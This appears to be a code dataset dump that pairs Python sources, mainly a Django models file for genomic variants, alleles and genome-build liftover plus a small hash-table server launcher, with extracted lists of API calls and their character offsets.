{}), '()\n', (11965, 11967), False, 'import rospy\n'), ((7799, 7830), 'rosparam.load_file', 'rosparam.load_file', (['config_path'], {}), '(config_path)\n', (7817, 7830), False, 'import rosparam\n')] |
#!/usr/bin/env python
from argparse import ArgumentParser
from dht.server import app
if __name__ == '__main__':
parser = ArgumentParser(
description='PiplineDHT -- A simple distributed hash table')
parser.add_argument('-n', '--name', action='store', required=True,
help='name of node')
parser.add_argument('-k', '--host', action='store', default='localhost',
help='hostname to bind to')
parser.add_argument('-p', '--port', action='store', type=int,
required=True, help='port to bind to')
args = parser.parse_args()
app.run(host=args.host, port=args.port)
| [
"dht.server.app.run",
"argparse.ArgumentParser"
] | [((126, 201), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""PiplineDHT -- A simple distributed hash table"""'}), "(description='PiplineDHT -- A simple distributed hash table')\n", (140, 201), False, 'from argparse import ArgumentParser\n'), ((602, 641), 'dht.server.app.run', 'app.run', ([], {'host': 'args.host', 'port': 'args.port'}), '(host=args.host, port=args.port)\n', (609, 641), False, 'from dht.server import app\n')] |
import collections
import logging
import re
from typing import Optional, Pattern, Tuple, Iterable, Set
import django.dispatch
from django.conf import settings
from django.contrib.auth.models import User
from django.db import models, IntegrityError
from django.db.models import Value as V, QuerySet, F
from django.db.models.deletion import CASCADE, DO_NOTHING
from django.db.models.fields import TextField
from django.db.models.functions import Greatest
from django.db.models.functions.text import Concat
from django.db.models.query_utils import Q, FilteredRelation
from django.dispatch import receiver
from django.urls.base import reverse
from django_extensions.db.models import TimeStampedModel
from lazy import lazy
from model_utils.managers import InheritanceManager
from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos
from flags.models.models import FlagsMixin, FlagTypeContext
from library.django_utils.django_partition import RelatedModelsPartitionModel
from library.genomics import format_chrom
from library.utils import md5sum_str
from snpdb.models import Wiki
from snpdb.models.flag_types import allele_flag_types
from snpdb.models.models_clingen_allele import ClinGenAllele
from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus
from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig
LOCUS_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)$", re.IGNORECASE)
LOCUS_NO_REF_PATTERN = r"^([^:]+):(\d+)$"
VARIANT_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)>(=|[GATC]+)$", re.IGNORECASE)
allele_validate_signal = django.dispatch.Signal(providing_args=["allele"])
class Allele(FlagsMixin, models.Model):
""" Genome build independent - ie GRCh37 and GRCh38 variants for same change point to same allele
This is generally done via ClinGen Allele Registry, but sometimes that can fail.
Linked against Variant with VariantAllele below """
clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE)
def get_absolute_url(self):
# will show allele if there is one, otherwise go to variant page
return reverse('view_allele', kwargs={"pk": self.id})
def flag_type_context(self) -> FlagTypeContext:
return FlagTypeContext.objects.get(pk="allele")
@lazy
def clingen_error(self):
error = None
if va := self.variantallele_set.filter(error__isnull=False).first():
error = va.error
return error
def variant_alleles(self):
return self.variantallele_set.order_by("genome_build__name")
@lazy
def grch37(self) -> Optional['Variant']:
try:
return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False)
except ValueError:
return None
@lazy
def grch38(self) -> Optional['Variant']:
try:
return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False)
except ValueError:
return None
@lazy
def variants(self):
return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True))
def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant':
vas = self.variant_alleles()
va = None
if genome_build:
va = vas.filter(genome_build=genome_build).first()
if not va and not best_attempt:
raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}')
if not va:
va = vas.first()
if va:
return va.variant
raise ValueError(f'Could not find any variants in allele {self.id}')
def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']:
""" Used by to write VCF coordinates during liftover. Can be slow (API call)
If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() """
from snpdb.models.models_dbsnp import DbSNP
from genes.hgvs import get_hgvs_variant_tuple
# Check if the other build shares existing contig
genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values())
for variant_allele in self.variantallele_set.all():
if variant_allele.variant.locus.contig_id in genome_build_contigs:
conversion_tool = AlleleConversionTool.SAME_CONTIG
variant_tuple = variant_allele.variant.as_tuple()
return conversion_tool, variant_tuple
conversion_tool = None
g_hgvs = None
if self.clingen_allele:
try:
g_hgvs = self.clingen_allele.get_g_hgvs(genome_build)
conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY
except ValueError: # Various contig errors all subclass from this
pass
if g_hgvs is None:
if settings.LIFTOVER_DBSNP_ENABLED:
va = self.variantallele_set.all().first()
if va is None:
raise ValueError("Allele contains no VariantAlleles at all! Cannot liftover")
dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version)
if dbsnp:
g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt)
conversion_tool = AlleleConversionTool.DBSNP
variant_tuple = None
if g_hgvs:
variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build)
return conversion_tool, variant_tuple
def merge(self, conversion_tool, other_allele: "Allele") -> bool:
""" Merge other_allele into this allele """
if self == other_allele:
raise ValueError(f"Attempt to merge {self} to itself!")
can_merge = True
merge_log_message = f"{other_allele} merge into {self}"
other_clingen_allele = other_allele.clingen_allele
if other_clingen_allele and self.clingen_allele:
can_merge = False
merge_log_message = f"Error performing {merge_log_message}: both have ClinGen Alleles!"
AlleleMergeLog.objects.create(old_allele=other_allele,
new_allele=self,
conversion_tool=conversion_tool,
success=can_merge,
message=merge_log_message)
if can_merge:
if other_clingen_allele:
# Move across ClinGen Allele (may not have been possible to retrieve in all builds, but at least one
# links there, and can't have another, so it'll work)
other_allele.clingen_allele = None
other_allele.save()
self.clingen_allele = other_clingen_allele
self.save()
if other_fc := other_allele.flag_collection:
other_fc.flag_set.update(collection=self.flag_collection_safe)
other_fc.flagwatch_set.update(flag_collection=self.flag_collection)
existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list("name", flat=True)
other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection)
other_fc.classification_set.update(flag_collection=self.flag_collection)
existing_allele_cc_names = self.clinicalcontext_set.values_list("name", flat=True)
other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self)
for va in other_allele.variantallele_set.all():
try:
va.allele = self
va.conversion_tool = conversion_tool
va.save()
except IntegrityError:
logging.warning("VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one",
va.allele, va.genome_build, va.variant)
va.delete()
return can_merge
@property
def build_names(self) -> str:
return ", ".join(sorted(self.variantallele_set.values_list("genome_build__name", flat=True)))
def __str__(self):
name = f"Allele {self.pk}"
if self.clingen_allele:
name += f" ({self.clingen_allele})"
return name
def __format__(self, format_spec: str):
if format_spec == 'CA' and (cligen_allele := self.clingen_allele):
return str(cligen_allele)
else:
return f"Allele {self.pk}"
def validate(self, liftover_complete=True):
"""
:param liftover_complete: If False does not check for missing representations
"""
if liftover_complete:
v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first()
v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first()
if v37:
self.close_open_flags_of_type(allele_flag_types.missing_37)
else:
self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True)
if v38:
self.close_open_flags_of_type(allele_flag_types.missing_38)
else:
self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True)
allele_validate_signal.send(sender=Allele, allele=self)
@receiver(flag_collection_extra_info_signal, sender=FlagCollection)
def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument
alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids)
allele: Allele
for allele in alleles:
flag_infos.set_extra_info(allele.flag_collection_id, {
'label': f'Allele {allele.id}'
}, source_object=allele)
class AlleleMergeLog(TimeStampedModel):
""" Keep track of calls to Allele.merge() """
old_allele = models.ForeignKey(Allele, related_name="old_allele_merge", on_delete=CASCADE)
new_allele = models.ForeignKey(Allele, related_name="new_allele_merge", on_delete=CASCADE)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
success = models.BooleanField(default=True)
message = models.TextField(null=True)
VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt')
class Sequence(models.Model):
"""
We want to guarantee seq is unique (so Locus/Variant can have unique constraints)
Postgres by default uses indexes for constraints, and large TextFields give error of:
"index row requires x bytes, maximum size is 8191"
The easiest solution is to md5sum seq and make the constraint on that. Another possible solution is to use
Gist indexes but that requires installing the btree_gist extension (requires postgres Admin rights).
Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration
"""
seq = models.TextField()
seq_md5_hash = models.CharField(max_length=32, unique=True)
length = models.IntegerField()
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
if not self.seq_md5_hash:
self.seq_md5_hash = md5sum_str(self.seq)
super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)
@staticmethod
def abbreviate(s: str, max_length: int = 20):
if len(s) > max_length:
s = f"{s[:3]}...{s[-3:]}"
return s
def __str__(self):
return self.abbreviate(self.seq)
@staticmethod
def get_pk_by_seq(q=None):
qs = Sequence.objects.all()
if q:
qs = qs.filter(q)
return dict(qs.values_list("seq", "pk"))
def is_standard_sequence(self):
""" only contains G/A/T/C/N """
return not re.match(r"[^GATCN]", self.seq)
class Locus(models.Model):
""" 1 per line in a VCF file (multiple Variants with different alt alleles point to the same locus)
There is only 1 Locus for a given chrom/position/ref per database (handled via insertion queues) """
contig = models.ForeignKey(Contig, on_delete=CASCADE)
position = models.IntegerField(db_index=True)
ref = models.ForeignKey(Sequence, on_delete=CASCADE)
class Meta:
unique_together = ("contig", "position", "ref")
@property
def chrom(self):
return self.contig.name
def __str__(self):
return f"{self.chrom}:{self.position} {self.ref}"
class Variant(models.Model):
""" Variants represent the different alleles at a locus
Usually 2+ per line in a VCF file (ref + >= 1 alts pointing to the same locus for the row)
There is only 1 Variant for a given locus/alt per database (handled via insertion queues) """
REFERENCE_ALT = "="
locus = models.ForeignKey(Locus, on_delete=CASCADE)
alt = models.ForeignKey(Sequence, on_delete=CASCADE)
class Meta:
unique_together = ("locus", "alt")
@staticmethod
def get_chrom_q(chrom):
return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom)
@staticmethod
def get_contigs_q(genome_build: GenomeBuild):
""" Restrict to contigs in a genome build """
return Q(locus__contig__genomebuildcontig__genome_build=genome_build)
@staticmethod
def get_no_reference_q():
return ~Q(alt__seq=Variant.REFERENCE_ALT)
@staticmethod
def get_overlap_annotate_and_q(contig, start, end):
""" Query handling indels. Contigs must match and variant.start <= end AND variant.end_position >= start """
annotation_kwargs = {"longest_sequence": Greatest("locus__ref__length", "alt__length"),
"end_position": F("locus__position") + F("longest_sequence")}
q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start)
return annotation_kwargs, q
@staticmethod
def annotate_variant_string(qs, name="variant_string", path_to_variant=""):
""" Return a "1:123321 G>C" style string in a query """
kwargs = {name: Concat(f"{path_to_variant}locus__contig__name", V(":"),
f"{path_to_variant}locus__position", V(" "),
f"{path_to_variant}locus__ref__seq", V(">"),
f"{path_to_variant}alt__seq", output_field=TextField())}
return qs.annotate(**kwargs)
@staticmethod
def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str:
if abbreviate:
ref = Sequence.abbreviate(ref)
alt = Sequence.abbreviate(alt)
return f"{chrom}:{position} {ref}>{alt}"
@staticmethod
def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild,
regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate:
""" regex_pattern - has to have 4 groups, returns (chrom, position, ref, alt) """
variant_tuple = None
if m := regex_pattern.match(variant_string):
chrom, position, ref, alt = m.groups()
chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt,
want_chr=genome_build.reference_fasta_has_chr)
contig = genome_build.chrom_contig_mappings[chrom]
variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt)
return variant_tuple
@staticmethod
def get_from_string(variant_string: str, genome_build: GenomeBuild,
regex_pattern=VARIANT_PATTERN) -> Optional['Variant']:
variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern)
try:
return Variant.get_from_tuple(variant_tuple, genome_build)
except Variant.DoesNotExist:
return None
@staticmethod
def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant':
params = ["locus__contig__name", "locus__position", "locus__ref__seq", "alt__seq"]
return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build,
**dict(zip(params, variant_tuple)))
@lazy
def genome_builds(self) -> Set['GenomeBuild']:
gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(),
contig__locus__variant=self)
return {gbc.genome_build for gbc in gbc_qs}
@lazy
def coordinate(self) -> VariantCoordinate:
locus = self.locus
contig = locus.contig
return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq)
@staticmethod
def is_ref_alt_reference(ref, alt):
return ref == alt or alt == '.'
@property
def is_reference(self) -> bool:
return self.alt.seq == self.REFERENCE_ALT
@property
def is_standard_variant(self) -> bool:
""" Variant alt sequence is standard [GATCN] (ie not special or reference) """
# locus.ref should always be standard...
return self.alt.is_standard_sequence()
@property
def is_indel(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length
@property
def is_insertion(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length
@property
def is_deletion(self) -> bool:
return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length
@property
def can_have_clingen_allele(self) -> bool:
return self.is_standard_variant or self.is_reference
@property
def can_have_annotation(self) -> bool:
return self.is_standard_variant
def as_tuple(self) -> VariantCoordinate:
return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq
def is_abbreviated(self):
return str(self) != self.full_string
@lazy
def full_string(self):
""" No abbreviation """
return self.format_tuple(*self.as_tuple())
def __str__(self):
return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt)
def get_absolute_url(self):
# will show allele if there is one, otherwise go to variant page
return reverse('view_allele_from_variant', kwargs={"variant_id": self.pk})
@lazy
def allele(self) -> Optional[Allele]:
va = VariantAllele.objects.filter(variant=self).first()
if va:
return va.allele
return None
@property
def equivalent_variants(self) -> Iterable['Variant']:
allele = self.allele
if not allele:
return [self]
return Variant.objects.filter(variantallele__allele=allele)
def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
vav = genome_build.latest_variant_annotation_version
return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first()
def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:
vav = genome_build.latest_variant_annotation_version
if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first():
return can
if version := self.varianttranscriptannotation_set.filter(version=vav).first():
return version
if any_at_all := self.varianttranscriptannotation_set.first():
return any_at_all
def get_canonical_c_hgvs(self, genome_build):
c_hgvs = None
if cta := self.get_canonical_transcript_annotation(genome_build):
c_hgvs = cta.hgvs_c
return c_hgvs
@property
def start(self):
return self.locus.position
@property
def end(self):
return self.locus.position + max(self.locus.ref.length, self.alt.length)
@staticmethod
def clean_variant_fields(chrom, position, ref, alt, want_chr):
ref = ref.strip().upper()
alt = alt.strip().upper()
if Variant.is_ref_alt_reference(ref, alt):
alt = Variant.REFERENCE_ALT
chrom = format_chrom(chrom, want_chr)
return chrom, position, ref, alt
class VariantWiki(Wiki):
variant = models.OneToOneField(Variant, on_delete=CASCADE)
class VariantAllele(TimeStampedModel):
""" It's possible for multiple variants from the same genome build to
resolve to the same allele (due to our normalization not being the same as ClinGen
or 2 loci in a genome build being represented by 1 loci in the build being used
by ClinGen) - but it's not likely. It's a bug to have the same 3 variant/build/allele
so we can add that unique_together constraint
We only expect to store Alleles for a small fraction of Variants
So don't want them on the Variant object - instead do 1-to-1 """
# Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases
# we'll have the same variant linked through different VariantAlleles (so it can't be 1-to-1)
variant = models.ForeignKey(Variant, on_delete=CASCADE)
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
allele = models.ForeignKey(Allele, on_delete=CASCADE)
origin = models.CharField(max_length=1, choices=AlleleOrigin.choices)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
error = models.JSONField(null=True) # Only set on error
class Meta:
unique_together = ("variant", "genome_build", "allele")
@property
def canonical_c_hgvs(self):
return self.variant.get_canonical_c_hgvs(self.genome_build)
def needs_clingen_call(self):
if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None:
if self.error:
# Retry if server was down
return self.error.get("errorType") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE
return True
return False
def __str__(self):
return f"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})"
class VariantCollection(RelatedModelsPartitionModel):
""" A set of variants - usually used as a cached result """
RECORDS_BASE_TABLE_NAMES = ["snpdb_variantcollectionrecord"]
RECORDS_FK_FIELD_TO_THIS_MODEL = "variant_collection_id"
PARTITION_LABEL_TEXT = "variant_collection"
name = models.TextField(null=True)
count = models.IntegerField(null=True)
status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED)
@property
def variant_collection_alias(self):
return f"variantcollection_{self.pk}"
def get_annotation_kwargs(self):
vcr_condition = Q(variantcollectionrecord__variant_collection=self)
return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)}
def get_q(self):
if self.status != ProcessingStatus.SUCCESS:
raise ValueError(f"{self}: status {self.get_status_display()} != SUCCESS")
return Q(**{f"{self.variant_collection_alias}__isnull": False})
def __str__(self):
return f"VariantCollection: {self.pk} ({self.name})"
class VariantCollectionRecord(models.Model):
variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition
variant = models.ForeignKey(Variant, on_delete=CASCADE)
class AlleleSource(models.Model):
""" Provides a source of alleles for liftover pipelines. """
objects = InheritanceManager()
def get_genome_build(self):
return None
def get_variants_qs(self):
return Variant.objects.none()
def get_allele_qs(self):
return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs())
def liftover_complete(self, genome_build: GenomeBuild):
""" This is called at the end of a liftover pipeline (once per build) """
pass
class VariantAlleleSource(AlleleSource):
variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)
def get_genome_build(self):
return self.variant_allele.genome_build
def get_variants_qs(self):
return Variant.objects.filter(variantallele=self.variant_allele)
@staticmethod
def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']:
""" Only works if liftover was done via VariantAlleleSource """
allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele)
return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first()
class VariantAlleleCollectionSource(AlleleSource):
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)
def get_genome_build(self):
return self.genome_build
def get_variants_qs(self):
return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids())
def get_variant_allele_ids(self):
return self.variantallelecollectionrecord_set.values_list("variant_allele", flat=True)
class VariantAlleleCollectionRecord(models.Model):
collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE)
variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)
class Liftover(TimeStampedModel):
""" Liftover pipeline involves reading through a VCF where ID is set to Allele.pk and then creating
VariantAllele entries for the variant/allele
Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired genome build
For others (NCBI Remap) we need to write the source genome build VCF first
Alleles must have already been created - allele_source used to retrieve them
The VCF (in genome_build build) is set in UploadedFile for the UploadPipeline """
user = models.ForeignKey(User, on_delete=CASCADE)
allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE)
conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices)
source_vcf = models.TextField(null=True)
source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE,
related_name="liftover_source_genome_build")
genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination
def get_allele_source(self) -> AlleleSource:
""" Returns subclass instance """
return AlleleSource.objects.get_subclass(pk=self.allele_source_id)
def get_allele_qs(self) -> QuerySet:
return self.get_allele_source().get_allele_qs()
def complete(self):
self.get_allele_source().liftover_complete(genome_build=self.genome_build)
def __str__(self):
source = ""
if self.source_genome_build:
source = f"from {self.source_genome_build.name} "
return f"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}"
class LiftoverError(models.Model):
liftover = models.ForeignKey(Liftover, on_delete=CASCADE)
allele = models.ForeignKey(Allele, on_delete=CASCADE)
variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but invalid
error_message = models.TextField()
class Meta:
unique_together = ('liftover', 'allele')
def __str__(self):
return f"{self.allele} failed {self.liftover}: {self.error_message}"
| [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.dispatch.receiver",
"django.db.models.functions.Greatest",
"django.db.models.Value",
"logging.warning",
"django.db.models.JSONField",
"django.db.models.BooleanField",
"django.db.models.F",
"snpdb.models.models_genome.GenomeBuild.grch38",
"django.db.models.query_utils.FilteredRelation",
"django.db.models.query_utils.Q",
"re.match",
"django.db.models.fields.TextField",
"library.utils.md5sum_str",
"snpdb.models.models_dbsnp.DbSNP.get_for_variant",
"snpdb.models.models_genome.GenomeBuild.grch37",
"snpdb.models.models_genome.GenomeBuild.builds_with_annotation",
"re.compile",
"django.db.models.OneToOneField",
"flags.models.models.FlagTypeContext.objects.get",
"library.genomics.format_chrom",
"django.db.models.CharField",
"genes.hgvs.get_hgvs_variant_tuple",
"model_utils.managers.InheritanceManager",
"django.db.models.IntegerField",
"collections.namedtuple",
"django.urls.base.reverse"
] | [((1406, 1467), 're.compile', 're.compile', (['"""^([^:]+):(\\\\d+)[,\\\\s]*([GATC]+)$"""', 're.IGNORECASE'], {}), "('^([^:]+):(\\\\d+)[,\\\\s]*([GATC]+)$', re.IGNORECASE)\n", (1416, 1467), False, 'import re\n'), ((1527, 1600), 're.compile', 're.compile', (['"""^([^:]+):(\\\\d+)[,\\\\s]*([GATC]+)>(=|[GATC]+)$"""', 're.IGNORECASE'], {}), "('^([^:]+):(\\\\d+)[,\\\\s]*([GATC]+)>(=|[GATC]+)$', re.IGNORECASE)\n", (1537, 1600), False, 'import re\n'), ((9703, 9769), 'django.dispatch.receiver', 'receiver', (['flag_collection_extra_info_signal'], {'sender': 'FlagCollection'}), '(flag_collection_extra_info_signal, sender=FlagCollection)\n', (9711, 9769), False, 'from django.dispatch import receiver\n'), ((10612, 10676), 'collections.namedtuple', 'collections.namedtuple', (['"""VariantCoordinate"""', '"""chrom pos ref alt"""'], {}), "('VariantCoordinate', 'chrom pos ref alt')\n", (10634, 10676), False, 'import collections\n'), ((1991, 2056), 'django.db.models.OneToOneField', 'models.OneToOneField', (['ClinGenAllele'], {'null': '(True)', 'on_delete': 'CASCADE'}), '(ClinGenAllele, null=True, on_delete=CASCADE)\n', (2011, 2056), False, 'from django.db import models, IntegrityError\n'), ((10236, 10313), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Allele'], {'related_name': '"""old_allele_merge"""', 'on_delete': 'CASCADE'}), "(Allele, related_name='old_allele_merge', on_delete=CASCADE)\n", (10253, 10313), False, 'from django.db import models, IntegrityError\n'), ((10331, 10408), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Allele'], {'related_name': '"""new_allele_merge"""', 'on_delete': 'CASCADE'}), "(Allele, related_name='new_allele_merge', on_delete=CASCADE)\n", (10348, 10408), False, 'from django.db import models, IntegrityError\n'), ((10431, 10499), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2)', 'choices': 'AlleleConversionTool.choices'}), '(max_length=2, choices=AlleleConversionTool.choices)\n', (10447, 10499), False, 'from django.db import models, IntegrityError\n'), ((10514, 10547), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (10533, 10547), False, 'from django.db import models, IntegrityError\n'), ((10562, 10589), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (10578, 10589), False, 'from django.db import models, IntegrityError\n'), ((11306, 11324), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (11322, 11324), False, 'from django.db import models, IntegrityError\n'), ((11344, 11388), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)', 'unique': '(True)'}), '(max_length=32, unique=True)\n', (11360, 11388), False, 'from django.db import models, IntegrityError\n'), ((11402, 11423), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (11421, 11423), False, 'from django.db import models, IntegrityError\n'), ((12505, 12549), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Contig'], {'on_delete': 'CASCADE'}), '(Contig, on_delete=CASCADE)\n', (12522, 12549), False, 'from django.db import models, IntegrityError\n'), ((12565, 12599), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'db_index': '(True)'}), '(db_index=True)\n', (12584, 12599), False, 'from django.db import models, IntegrityError\n'), ((12610, 12656), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Sequence'], {'on_delete': 'CASCADE'}), '(Sequence, on_delete=CASCADE)\n', (12627, 12656), False, 'from django.db import models, IntegrityError\n'), ((13209, 13252), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Locus'], {'on_delete': 'CASCADE'}), '(Locus, on_delete=CASCADE)\n', (13226, 13252), False, 'from django.db import models, IntegrityError\n'), ((13263, 13309), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Sequence'], {'on_delete': 'CASCADE'}), '(Sequence, on_delete=CASCADE)\n', (13280, 13309), False, 'from django.db import models, IntegrityError\n'), ((20911, 20959), 'django.db.models.OneToOneField', 'models.OneToOneField', (['Variant'], {'on_delete': 'CASCADE'}), '(Variant, on_delete=CASCADE)\n', (20931, 20959), False, 'from django.db import models, IntegrityError\n'), ((21763, 21808), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Variant'], {'on_delete': 'CASCADE'}), '(Variant, on_delete=CASCADE)\n', (21780, 21808), False, 'from django.db import models, IntegrityError\n'), ((21828, 21877), 'django.db.models.ForeignKey', 'models.ForeignKey', (['GenomeBuild'], {'on_delete': 'CASCADE'}), '(GenomeBuild, on_delete=CASCADE)\n', (21845, 21877), False, 'from django.db import models, IntegrityError\n'), ((21891, 21935), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Allele'], {'on_delete': 'CASCADE'}), '(Allele, on_delete=CASCADE)\n', (21908, 21935), False, 'from django.db import models, IntegrityError\n'), ((21949, 22009), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1)', 'choices': 'AlleleOrigin.choices'}), '(max_length=1, choices=AlleleOrigin.choices)\n', (21965, 22009), False, 'from django.db import models, IntegrityError\n'), ((22032, 22100), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2)', 'choices': 'AlleleConversionTool.choices'}), '(max_length=2, choices=AlleleConversionTool.choices)\n', (22048, 22100), False, 'from django.db import models, IntegrityError\n'), ((22113, 22140), 'django.db.models.JSONField', 'models.JSONField', ([], {'null': '(True)'}), '(null=True)\n', (22129, 22140), False, 'from django.db import models, IntegrityError\n'), ((23125, 23152), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (23141, 23152), False, 'from django.db import models, IntegrityError\n'), ((23165, 23195), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (23184, 23195), False, 'from django.db import models, IntegrityError\n'), ((23209, 23312), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1)', 'choices': 'ProcessingStatus.choices', 'default': 'ProcessingStatus.CREATED'}), '(max_length=1, choices=ProcessingStatus.choices, default=\n ProcessingStatus.CREATED)\n', (23225, 23312), False, 'from django.db import models, IntegrityError\n'), ((24031, 24089), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VariantCollection'], {'on_delete': 'DO_NOTHING'}), '(VariantCollection, on_delete=DO_NOTHING)\n', (24048, 24089), False, 'from django.db import models, IntegrityError\n'), ((24134, 24179), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Variant'], {'on_delete': 'CASCADE'}), '(Variant, on_delete=CASCADE)\n', (24151, 24179), False, 'from django.db import models, IntegrityError\n'), ((24295, 24315), 'model_utils.managers.InheritanceManager', 'InheritanceManager', ([], {}), '()\n', (24313, 24315), False, 'from model_utils.managers import InheritanceManager\n'), ((24777, 24828), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VariantAllele'], {'on_delete': 'CASCADE'}), '(VariantAllele, on_delete=CASCADE)\n', (24794, 24828), False, 'from django.db import models, IntegrityError\n'), ((25462, 25511), 'django.db.models.ForeignKey', 'models.ForeignKey', (['GenomeBuild'], {'on_delete': 'CASCADE'}), '(GenomeBuild, on_delete=CASCADE)\n', (25479, 25511), False, 'from django.db import models, IntegrityError\n'), ((25901, 25968), 'django.db.models.ForeignKey', 'models.ForeignKey', (['VariantAlleleCollectionSource'], {'on_delete': 